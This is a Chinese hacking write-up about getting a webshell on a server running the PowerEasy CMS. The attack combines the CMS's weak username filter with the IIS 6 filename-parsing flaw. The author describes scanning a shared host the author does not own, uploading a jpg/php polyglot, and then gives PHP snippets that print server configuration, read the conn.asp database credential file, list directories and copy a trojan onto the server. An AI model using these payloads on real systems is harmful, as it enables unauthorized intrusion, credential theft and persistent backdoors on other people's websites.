作者: close999
来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)


原理    : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是      : 服务器是win2003 全功能的空间


**************************************************
'函数名：UserNamefilter(
'作   用：过滤用户名(增强过滤,用户名现用于建立个人文集目录)
'**************************************************
Function UserNamefilter(strChar)
     If strChar = "" Or IsNull(strChar) Then
         UserNamefilter = ""
         Exit Function
     End If
     Dim strBadChar, arrBadChar, tempChar, i
     strBadChar = "',%,^,&,?,(,),<,>,[,],{,},/,\,;,:," & Chr(34) & "," & Chr(0) & ",*,|,"""
     arrBadChar = Split(strBadChar, ",")
     tempChar = strChar
     For i = 0 To UBound(arrBadChar)
         tempChar = Replace(tempChar, arrBadChar(i), "")
     Next
     UserNamefilter = Replace(Replace(Replace(Replace(LCase(tempChar),"cdx",""),"cer",""),"asp",""),"asa","")
End Function
%>

今天在看一个空间的时候,发现是动易,已打补丁.
旁注一查是虚拟主机 本来多没抱多大希望了
随便看了一下几个网站 发现是全能空间
拿出X-Scan狂扫一下 终端登录一下确定是win2003
默认的IIS 6解析文件名错误包含 .php .pl
动易Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
这就给我们机会了 呵呵

先看一下下面的图片默认的.asp用户名已经不能注册了

兴冲冲的把asp马改成jpg 去传结果如下

既然这个方法不行就要想其他办法了 既然是在.php的目录下 php语句不知道能不能执行
由于我PHP实在不懂,google狂找一下 难免弯路有走了很多
退回原来的思路 构建JPG GIF的文件头的PHP或者ASP木马 好像我还没那技术 呵呵
最后把jpg和php合并为jpg文件上传到空间



运行 发现能执行PHP语句 接下来事情就好办了

一
查看php配置信息 网站的绝对路径
<?php phpinfo(); ?>

二
读取conn.asp的内容
<?php
$file_handle = fopen("服务器本地地址", "r");
while (!feof($file_handle)) {
    $line = fgets($file_handle);
    echo $line;
}
fclose($file_handle);
?>

三
读取网站目录
<?php
$base_dir = "filelist/";
$fso   = opendir($base_dir);
echo $base_dir."<hr/>"   ;
while($flist=readdir($fso)){
echo $flist."<br/>" ;
}
closedir($fso)
?>

四
突破上传限制 得到webshell
<?php
$bruce=fopen("木马地址","r");
if(!$bruce)
{
     echo'文件不存在';
     exit;
}
while (!feof($bruce))
{
     $rose=fgets($bruce);
         $james=fopen("服务器本地路径","a");
         fwrite($james,$rose);
         fclose($james);
}
fclose($bruce);
?>